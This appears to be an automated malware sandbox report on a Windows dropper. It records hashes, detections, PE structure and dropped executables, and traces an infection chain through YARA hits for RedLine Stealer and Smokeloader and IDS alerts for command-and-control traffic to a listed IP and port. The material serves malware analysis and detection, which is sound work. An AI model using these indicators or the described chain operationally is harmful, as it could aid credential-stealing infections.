SSDEEP:3072:nHOAjO/AOKJL0or0n7zSoP2fbB+XgRU2DnufOEjc7NfiWOpIn+vnJVb+:Hli/ARV0or0xCB6ghDufydSgQnr+
MD5:16CD045519321C1F674C2C52ED92CD5A
SHA1:41703764D7FF71A0DAD4B54F62FA8412C45B3EDE
SHA-256:B873395D8B0B53E7C0F6192AE48A129253F4D592A58919DDE8668B9D3FA9EB33
SHA-512:B72315FF3771EF4F4CA669D991D1FDF2928CB0B6F377D682B267583F8382870EF6987DBC780F73AC6B1FBD51593803478910187D62B5B06C3015FF8CE9C7D07E
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 26%
Joe Sandbox View:
• Filename: a2H0BckZji.exe, Detection: malicious
• Filename: keUAZCkfIk.exe, Detection: malicious
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i .L.NIL.NIL.NI.F.IM.NI#~.IU.NI#~.I".NIEp.IK.NIL.OI#.NI#~.IW.NI#~.IM.NI#~.IM.NIRichL.NI........................PE..L...~.[a............................\_.......@....@.................................-........................................3..P....`..@...........................................................(7..@............................................text....-.......................... ..`.data........@.......2..............@....rsrc...@....`.......4..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):397824
Entropy (8bit):7.705781046496275
Encrypted:false
SSDEEP:6144:Kby+bnr+EaN7MqvKSyeO+ueO+zjTDzjTmmmmp2222222cBxhRBxhRBxhRBxqVp0h:pMrCy90LIFe8KUtZclauXEPV8h9riU
MD5:C55924DDF020D2D574D1FF1BDF1446FC
SHA1:EBF73995124960D5ACA074A3D54F61721E213315
SHA-256:8A7C493DD26705372D5D0B4D1F10AC5012651FDB080C0D5C9D06AF74FA4BDFC1
SHA-512:FE8320D7EE3B8AF751241FFAE0B0740E1058E80540583A241D210AD7F37ADB08FE82EDB9A1222544BDCA5E45F4ACEF91BE9A2BE22061020E3C96E2E6142ED382
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@..........................`......q.....@...... ..........................................................P..........T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................|..............@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):11614
Entropy (8bit):4.862051929853911
Encrypted:false
SSDEEP:96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
MD5:23F943F98B2EEF1D8427BA90111C34E2
SHA1:47BE76D126057E63DD8C9BE3F7EAC252A86A9B53
SHA-256:76EE34B15E8F7D1A38BA5D8221AC5144BC624A7253195AFEE8E83D93C68DE6D5
SHA-512:32EA29DF413FDC8F630212957A8E4FD91575A9431DA4750758B156EC013F6C5C700FECA8271AEE81FB5DC6EF12EA4578F107781149563BE2988A28A2FEB9D811
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.."...........@... ...`....@.. ....................................@..................................@..O....`...............................@..8............................................ ............... ..H............text.... ... ...".................. ..`.rsrc........`.......$..............@..@.reloc...............*..............@..B.................@......H.......T$...............................................................0...........@s.....@...(....&*..0..K......... ?...(......~....(....,.*r...p.....(....%..(....& ....(....(....&.(....&*..0..e.......(....~........+G.....o....r#..p(....,-.o.... ......(....-.*.(....&(.....o....(....&..X....i2..(....&*....0..`.......(....~........+B.....o....r...p(....,(.o.... ......(....-.*.(....&.o....(....&..X....i2..(....&*.0..c......... ?...(......~....(....,.*....(............%...(...
Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):313856
Entropy (8bit):7.320447473996942
Encrypted:false
SSDEEP:6144:h0xQZh23G4D4EFCd7KUGU+NSjclyAFhk68XEMDtRnZeTbE6PfM:h0SZSG4cTKUtvcllh0EcHZG
MD5:93E470CB72A45CE819FF3EDB9B4A51B3
SHA1:8F06779116BFAA52497EC079BC6C12C4EF88B68E
SHA-256:2C0208F12D918E001922D851B78A9C632B4E1959E1AA888BF7EFBA150ECAEE49
SHA-512:BC9D4583EC9C29D53D59352629BE5378F4D468DB0F0062BC0EC48624BD4F3C34AD7425B14EF27C21A4D6C4FB465A32186C4CDB8982CE8293CC3FAAA1940573D4
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i .L.NIL.NIL.NI.F.IM.NI#~.IU.NI#~.I".NIEp.IK.NIL.OI#.NI#~.IW.NI#~.IM.NI#~.IM.NIRichL.NI........................PE..L....N.a............................\_.......@....@..................................V.......................................3..P....P..@...........................................................(7..@............................................text....-.......................... ..`.data...P....@.......2..............@....rsrc...@....P......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.928880210499275
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:file.exe
File size:1046528
MD5:0c8e10cf6146a0f67d5e4f784c251ffe
SHA1:ec1922422ad71e92c53acbe0db7f27161fc8a426
SHA256:f4e5103746728e49e2aad05ffc1f61d58a9f61071a822642779d5980d001e54f
SHA512:b068ac9aaded5afd3dbbc4d3a362573fdd8ad0bb82c6673c22ad3e92c2ceb666ea8e397c54b90e830b838964ec0d6919f9a316e4edf0f136dc4d322f1ddcc74d
SSDEEP:24576:ryhN0hWbgTrEJK1yWy7SaAG+nIRwmFKk2AMukb:ehNsWEfEJ37eGSpmFKk2AMuk
TLSH:AA25220BD7EC9177D47117741AFA03D3063A7C62AA78529B2B8E5D1D0CB26B1B272327
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.
Icon Hash:f8e0e4e8ecccc870
Entrypoint:0x406a60
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:10
OS Version Minor:0
File Version Major:10
File Version Minor:0
Subsystem Version Major:10
Subsystem Version Minor:0
Import Hash:646167cce332c1c252cdcb1839e0cf48
Instruction
call 00007F7E18BDBED5h
jmp 00007F7E18BDB7E5h
push 00000058h
push 004072B8h
call 00007F7E18BDBF77h
xor ebx, ebx
mov dword ptr [ebp-20h], ebx
lea eax, dword ptr [ebp-68h]
push eax
call dword ptr [0040A184h]
mov dword ptr [ebp-04h], ebx
mov eax, dword ptr fs:[00000018h]
mov esi, dword ptr [eax+04h]
mov edi, ebx
mov edx, 004088ACh
mov ecx, esi
xor eax, eax
lock cmpxchg dword ptr [edx], ecx
test eax, eax
je 00007F7E18BDB7FAh
cmp eax, esi
jne 00007F7E18BDB7E9h
xor esi, esi
inc esi
mov edi, esi
jmp 00007F7E18BDB7F2h
push 000003E8h
call dword ptr [0040A188h]
jmp 00007F7E18BDB7B9h
xor esi, esi
inc esi
cmp dword ptr [004088B0h], esi
jne 00007F7E18BDB7ECh
push 0000001Fh
call 00007F7E18BDBD0Bh
pop ecx
jmp 00007F7E18BDB81Ch
cmp dword ptr [004088B0h], ebx
jne 00007F7E18BDB80Eh
mov dword ptr [004088B0h], esi
push 004010C4h
push 004010B8h
call 00007F7E18BDB936h
pop ecx
pop ecx
                                                                                                                                                                                                  test eax, eax
                                                                                                                                                                                                  je 00007F7E18BDB7F9h
                                                                                                                                                                                                  mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                  mov eax, 000000FFh
                                                                                                                                                                                                  jmp 00007F7E18BDB919h
                                                                                                                                                                                                  mov dword ptr [004081E4h], esi
                                                                                                                                                                                                  cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                  jne 00007F7E18BDB7FDh
                                                                                                                                                                                                  push 004010B4h
                                                                                                                                                                                                  push 004010ACh
                                                                                                                                                                                                  call 00007F7E18BDBEC5h
                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                  pop ecx
                                                                                                                                                                                                  mov dword ptr [000088B0h], 00000000h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa28c | 0xb4 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0xf7084 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x104000 | 0x888 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1410 | 0x54 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1008 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xa000 | 0x288 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6314 | 0x6400 | False | 0.5744140625 | data | 6.314163792045976 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x8000 | 0x1a48 | 0x200 | False | 0.609375 | data | 4.970639543960129 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xa000 | 0x1052 | 0x1200 | False | 0.4140625 | data | 5.025949912909207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xc000 | 0xf8000 | 0xf7200 | False | 0.9623946873419322 | data | 7.948377611360806 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x104000 | 0x888 | 0xa00 | False | 0.746484375 | data | 6.222637930812128 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
AVI | 0xcb30 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | English | United States
RT_ICON | 0xf94c | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States
RT_ICON | 0xffb4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States
RT_ICON | 0x1029c | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States
RT_ICON | 0x10484 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States
RT_ICON | 0x105ac | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States
RT_ICON | 0x11454 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States
RT_ICON | 0x11cfc | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States
RT_ICON | 0x123c4 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States
RT_ICON | 0x1292c | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x20300 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States
RT_ICON | 0x228a8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States
RT_ICON | 0x23950 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States
RT_ICON | 0x242d8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States
RT_DIALOG | 0x24740 | 0x2f2 | data | English | United States
RT_DIALOG | 0x24a34 | 0x35c | data | Russian | Russia
RT_DIALOG | 0x24d90 | 0x1b0 | data | English | United States
RT_DIALOG | 0x24f40 | 0x1b4 | data | Russian | Russia
RT_DIALOG | 0x250f4 | 0x166 | data | English | United States
RT_DIALOG | 0x2525c | 0x168 | data | Russian | Russia
RT_DIALOG | 0x253c4 | 0x1c0 | data | English | United States
RT_DIALOG | 0x25584 | 0x1e0 | data | Russian | Russia
RT_DIALOG | 0x25764 | 0x130 | data | English | United States
RT_DIALOG | 0x25894 | 0x150 | data | Russian | Russia
RT_DIALOG | 0x259e4 | 0x120 | data | English | United States
RT_DIALOG | 0x25b04 | 0x122 | data | Russian | Russia
RT_STRING | 0x25c28 | 0x8c | Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0 | English | United States
RT_STRING | 0x25cb4 | 0x86 | Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0 | Russian | Russia
RT_STRING | 0x25d3c | 0x520 | data | English | United States
RT_STRING | 0x2625c | 0x52e | data | Russian | Russia
RT_STRING | 0x2678c | 0x5cc | data | English | United States
RT_STRING | 0x26d58 | 0x592 | data | Russian | Russia
RT_STRING | 0x272ec | 0x4b0 | data | English | United States
RT_STRING | 0x2779c | 0x4b2 | data | Russian | Russia
RT_STRING | 0x27c50 | 0x44a | data | English | United States
RT_STRING | 0x2809c | 0x43e | data | Russian | Russia
RT_STRING | 0x284dc | 0x3ce | data | English | United States
RT_STRING | 0x288ac | 0x2fc | data | Russian | Russia
RT_RCDATA | 0x28ba8 | 0x7 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x28bb0 | 0xd939e | Microsoft Cabinet archive data, many, 889758 bytes, 2 files, at 0x2c +A "pluT14Nj54.exe" +A "grWB27Fb84.exe", ID 2298, number 1, 34 datablocks, 0x1503 compression | English | United States
RT_RCDATA | 0x101f50 | 0x4 | data | English | United States
RT_RCDATA | 0x101f54 | 0x24 | data | English | United States
RT_RCDATA | 0x101f78 | 0x7 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x101f80 | 0x7 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x101f88 | 0x4 | data | English | United States
RT_RCDATA | 0x101f8c | 0xf | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x101f9c | 0x4 | data | English | United States
RT_RCDATA | 0x101fa0 | 0xf | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x101fb0 | 0x4 | data | English | United States
RT_RCDATA | 0x101fb4 | 0x8 | data | English | United States
RT_RCDATA | 0x101fbc | 0x7 | ASCII text, with no line terminators | English | United States
RT_RCDATA | 0x101fc4 | 0x7 | ASCII text, with no line terminators | English | United States
RT_GROUP_ICON | 0x101fcc | 0xbc | data | English | United States
RT_VERSION | 0x102088 | 0x408 | data | English | United States
RT_VERSION | 0x102490 | 0x410 | data | Russian | Russia
RT_MANIFEST | 0x1028a0 | 0x7e2 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States
DLL | Import
ADVAPI32.dll | GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll | _lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
GDI32.dll | GetDeviceCaps
USER32.dll | SetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
msvcrt.dll | _controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
COMCTL32.dll |
Cabinet.dll |
VERSION.dll | GetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
Language of compilation system | Country where language is spoken
English | United States
Russian | Russia
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/27/23-21:18:20.122346 | TCP | 2043233 | ET TROJAN RedLine Stealer TCP CnC net.tcp Init | 49699 | 4123 | 192.168.2.3 | 193.233.20.24
02/27/23-21:18:21.439552 | TCP | 2043234 | ET MALWARE Redline Stealer TCP CnC - Id1Response | 4123 | 49699 | 193.233.20.24 | 192.168.2.3
02/27/23-21:18:31.861096 | TCP | 2043231 | ET TROJAN Redline Stealer TCP CnC Activity | 49699 | 4123 | 192.168.2.3 | 193.233.20.24
TCP packets: Timestamp | Source Port | Dest Port | Source IP | Dest IP

                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                  Start time:21:17:42
                                                                                                                                                                                                  Start date:27/02/2023
                                                                                                                                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                  Imagebase:0x170000
                                                                                                                                                                                                  File size:1046528 bytes
                                                                                                                                                                                                  MD5 hash:0C8E10CF6146A0F67D5E4F784C251FFE
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.256542191.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                  Start time:21:17:42
                                                                                                                                                                                                  Start date:27/02/2023
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe
                                                                                                                                                                                                  Imagebase:0x390000
                                                                                                                                                                                                  File size:906240 bytes
                                                                                                                                                                                                  MD5 hash:D16ACC7C93BF0ECC8BE14CAE8BE1F15A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                  • Detection: 54%, ReversingLabs
• Detection: 47%, Virustotal
                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                  Start time:21:17:43
                                                                                                                                                                                                  Start date:27/02/2023
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe
                                                                                                                                                                                                  Imagebase:0x130000
                                                                                                                                                                                                  File size:676864 bytes
                                                                                                                                                                                                  MD5 hash:A19D601A69B407CED85F6C6E721D0E2C
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                  • Detection: 54%, ReversingLabs
                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                  Start time:21:17:43
                                                                                                                                                                                                  Start date:27/02/2023
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe
                                                                                                                                                                                                  Imagebase:0xfd0000
                                                                                                                                                                                                  File size:397824 bytes
                                                                                                                                                                                                  MD5 hash:C55924DDF020D2D574D1FF1BDF1446FC
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                  Start time:21:17:44
                                                                                                                                                                                                  Start date:27/02/2023
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe
                                                                                                                                                                                                  Imagebase:0x900000
                                                                                                                                                                                                  File size:11614 bytes
                                                                                                                                                                                                  MD5 hash:23F943F98B2EEF1D8427BA90111C34E2
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                  Start time:21:17:51
                                                                                                                                                                                                  Start date:27/02/2023
                                                                                                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                  Imagebase:0x7ff6e8c60000
                                                                                                                                                                                                  File size:69632 bytes
                                                                                                                                                                                                  MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                  Start time:21:17:55
                                                                                                                                                                                                  Start date:27/02/2023
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:313856 bytes
                                                                                                                                                                                                  MD5 hash:93E470CB72A45CE819FF3EDB9B4A51B3
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000003.300274214.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.368106745.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000A.00000002.368106745.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000A.00000002.363557485.00000000008D6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.362811186.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000A.00000002.362811186.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: ditekSHen
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.368647038.0000000004B50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000A.00000002.368647038.0000000004B50000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.363309849.00000000007A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000003.303183570.0000000000941000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                  Start time:21:18:02
                                                                                                                                                                                                  Start date:27/02/2023
                                                                                                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                  Imagebase:0x7ff6e8c60000
                                                                                                                                                                                                  File size:69632 bytes
                                                                                                                                                                                                  MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                  Programmed in:C, C++ or other language
